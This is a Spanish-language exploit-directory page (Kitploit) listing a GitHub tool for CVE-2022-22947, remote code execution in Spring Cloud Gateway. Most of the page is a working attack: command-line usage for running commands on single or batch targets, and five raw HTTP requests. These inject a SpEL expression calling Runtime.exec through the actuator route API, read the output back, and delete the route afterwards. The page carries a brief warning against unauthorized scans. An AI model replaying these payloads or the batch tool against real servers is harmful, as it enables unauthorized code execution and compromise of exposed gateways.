Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22947-Spring-Cloud-Gateway — CVE-2022-22947 en lote | Kitploit
Herramientas/GitHubGitHub/tangxiaofeng7/cve-2022-22947-spring-cloud-gateway
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtangxiaofeng7/cve-2022-22947-spring-cloud-gateway

CVE-2022-22947-Spring-Cloud-Gateway

CVE-2022-22947 en lote

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
7120hace 4 añosRevisado por Kitploit

Vulnerabilidad de ejecución remota de código en Spring Cloud Gateway

Esta vulnerabilidad presenta un alto riesgo para los servicios en línea; no realice escaneos no autorizados.

Instrucciones de uso
root@kitploit:~
╰─ ./CVE-2022-22947 -h                                                                                                                                                                                                                                            ─╯
Ejecutar comando: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami 
Detección por lotes: ./CVE-2022-22947 -l url.txt 
Iniciar el entorno vulnerable
root@kitploit:~
java -jar vuln/spring-gateway-demo-0.0.1-SNAPSHOT.jar 
La vulnerabilidad se divide en 5 solicitudes

Primera solicitud (envíe el siguiente paquete para agregar una ruta que contenga una expresión SpEL maliciosa)

root@kitploit:~
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 366

{
      "id": "hacktest",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
        }],
      "uri": "http://example.com",
      "order": 0
    }

Segunda solicitud (actualice la ruta recién agregada)

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Tercera solicitud (ver el resultado de la ejecución)

root@kitploit:~
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

Cuarta solicitud (limpiar la ruta agregada)

root@kitploit:~
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Quinta solicitud (actualizar la ruta)

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Agradecimientos

Paquete JAR de 清水川崎 ; EXP de phith0n

Descargar herramienta